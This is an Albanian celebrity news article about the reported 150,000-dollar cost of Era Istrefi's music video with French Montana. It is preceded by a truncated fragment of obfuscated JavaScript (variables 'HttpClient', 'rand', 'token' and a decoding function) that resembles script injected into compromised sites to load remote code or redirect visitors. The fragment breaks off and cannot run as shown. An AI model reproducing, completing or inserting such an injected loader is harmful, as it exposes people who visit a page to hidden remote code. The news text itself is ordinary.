;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zbulohet shifra: Qindra mijëra euro për klipin e ri të Era Istrefit (VIDEO)

By

“No I love Yous”, ishte kënga që Era Istrefi e solli këtë verë. Pasi ‘boom-it’ ndërkombëtar që ajo pati me “Bon-bon” e “Redrum”, këngëtarja kësaj here u shfaq krah reperit maroken, 32 vjeçarit French Montana.

Klipi i ri ishte diçka e veçantë, e parë vetëm në projektet e këngëtareve me famë botërore.

Por sa i ka kushtuar Era Istrefit kripi i kësaj kënge, që u realizua në Los Angeles?

Këtë e ka zbuluar për revistën shqiptare “Story”, menaxheri i Erës, Faton Shoshi, i cili ka dhënë një shifër me shumë zero prapa.

“Ka kushtuar rreth 150 mijë Dollarë i gjithë projekti”, ka thënë Fatoni.

Vargjet e këngës janë shkruar nga vetë 21 vjeçarja, e cila në këtë projekt shfaqet shumë në formë, por me ndryshim të dukshëm në ngjyrën e flokëve, pasi nga biondja e projekteve të mëparshme tani është brune e theksuar.

Për realizimin e klipit, Era dhe Fatoni u vendosën në SHBA, ndërkaq ky bashkëpunim i këngëtares me Montana-n u konsiderua “bileta” e Era Istret, për të rimarrë dhe një herë vëmendjen e mediave ndërkombëtare.

Ky bashkëpunim vjen disa muaj pasi Era Istre publikoi klipin e këngës “Redrum”, projekti i cili pasoi super hitin “BonBon”, që e bëri të famshme këngëtaren shqiptare në tregun e huaj.

Pak para këtij projekti gazetari i “Forbes” Steve Baltin, e intervistoi Era Istrefin në SHBA, duke e cilësuar si këngëtarja nga Kosova që goditi skenën ndërkombëtare me klipin e saj “BonBon”, e që ja doli të merrte vëmendjen e botës. /Prive.al

Artikuj të ngjashëm